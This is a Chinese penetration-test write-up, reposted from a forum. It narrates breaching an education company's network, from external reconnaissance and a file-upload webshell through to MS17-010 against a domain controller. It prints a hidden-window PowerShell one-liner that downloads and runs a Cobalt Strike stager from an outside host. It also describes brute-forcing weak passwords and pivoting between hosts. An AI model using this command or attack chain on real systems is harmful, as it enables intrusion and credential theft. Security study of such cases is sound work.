渗透实战 | 从外网直接打到内网全过程

admin 2024年2月7日09:04:03评论33 views字数 919阅读3分3秒阅读模式

这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路

正文

目标:www.xxxx.com(一家教育机构)
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能

渗透实战 | 从外网直接打到内网全过程

进行了简单的信息搜集

子域名搜集

渗透实战 | 从外网直接打到内网全过程

fofa找资产

渗透实战 | 从外网直接打到内网全过程

一共七个资产。去重之后只有两个。

目录探测

渗透实战 | 从外网直接打到内网全过程

我尝试了暴力枚举,看有没有弱口令之类的,然而并没有

我又尝试了通过修改返回包来绕过登录界面

渗透实战 | 从外网直接打到内网全过程

还是不行,尝试注入无果

渗透实战 | 从外网直接打到内网全过程

不过我目录探测出了一处Spring信息泄露

渗透实战 | 从外网直接打到内网全过程

尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录

渗透实战 | 从外网直接打到内网全过程

后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。

渗透实战 | 从外网直接打到内网全过程

获取有些师傅到这一步就手机抓包电脑测了。

Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。

其中在一个公众号发现了小程序,可以进行注册。

看到了头像上传,尝试上传获取WebShell

渗透实战 | 从外网直接打到内网全过程

未做任何限制成功GetShell,上了冰蝎马,目录没权限访问

渗透实战 | 从外网直接打到内网全过程

然后上了大马

渗透实战 | 从外网直接打到内网全过程

渗透实战 | 从外网直接打到内网全过程

通过翻找文件发现数据库账号密码

渗透实战 | 从外网直接打到内网全过程

--内网渗透

直接通过powershell执行 cs上线

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"

渗透实战 | 从外网直接打到内网全过程

进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破

渗透实战 | 从外网直接打到内网全过程

登录爆破出来的服务器,发现多网卡且存在逻辑隔离。

渗透实战 | 从外网直接打到内网全过程

通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭

渗透实战 | 从外网直接打到内网全过程

小结

渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!

作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html

声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权!否则需自行承担,本公众号及原作者不承担相应的后果

原文始发于微信公众号(渗透安全团队):渗透实战 | 从外网直接打到内网全过程

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月7日09:04:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透实战 | 从外网直接打到内网全过程http://cn-sec.com/archives/2477171.html

发表评论

匿名网友 填写信息